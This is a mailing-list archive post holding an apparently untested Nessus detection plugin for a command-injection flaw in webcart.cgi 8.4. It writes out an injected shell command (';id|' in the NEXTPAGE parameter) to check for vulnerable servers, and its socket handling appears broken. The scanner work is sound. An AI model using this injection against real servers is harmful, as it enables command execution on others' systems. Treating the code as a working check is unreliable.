Mailing List Archive

webcart.cgi
I do not have this webcart.cgi, so I was unable to test it.
If anybody can, I'd like to hear from it.






# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
# *untested*
#
# References:
# Date: Fri, 19 Oct 2001 03:29:24 +0000
# From: root@xpteam.f2s.com
# To: bugtraq@securityfocus.com
# Subject: Webcart v.8.4


if(description)
{
script_id(10094);
script_version ("$Revision$");

name["english"] = "webcart.cgi";
script_name(english:name["english"]);

desc["english"] = "
webcart.cgi is installed and does not properly filter user input.
A cracker may use this flaw to execute any command on your system.

Solution : Upgrade your software or firewall your web server

Risk factor : High";


desc["francais"] = "
webcart.cgi est installé et ne filtre pas les entrées de l'utilisateur.
Un pirate peut utiliser cette faille pour lancer n'importe quelle
commande sur votre système.

Solution : Mettez à jour ce logiciel ou protégez votre serveur web

Facteur de risque : Elevé";

script_description(english:desc["english"], francais:desc["francais"]);

summary["english"] = "Detects webcart.cgi";
summary["francais"] = "Détecte webcart.cgi";

script_summary(english:summary["english"], francais:summary["francais"]);

script_category(ACT_GATHER_INFO);


script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
francais:"Ce script est Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("find_service.nes", "no404.nasl");
script_require_ports("Services/www", 80);
exit(0);
}

#

port = is_cgi_installed(port: port, item: "webcart/webcart.cgi");
if (! port) exit(0);

req = http_get(port: port, item: "/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD");

send(socket: soc, data: req);
buf = recv(socket: soc, length: 4096);
close(soc);

if (("uid=" >< buf) && ("gid=" >< buf))
{
security_hole(port);
exit(0);
}


m = "
webcart.cgi was found on this server.
Some versions (8.4 at least) allowed did not properly filter user input.
A cracker might use this flaw to execute any command on your system.

** Nessus was unable to exploit the flaw or to check the CGI version.

Solution : If necessary, upgrade your software

Risk factor : None / High";

security_warning(port: port, data: m);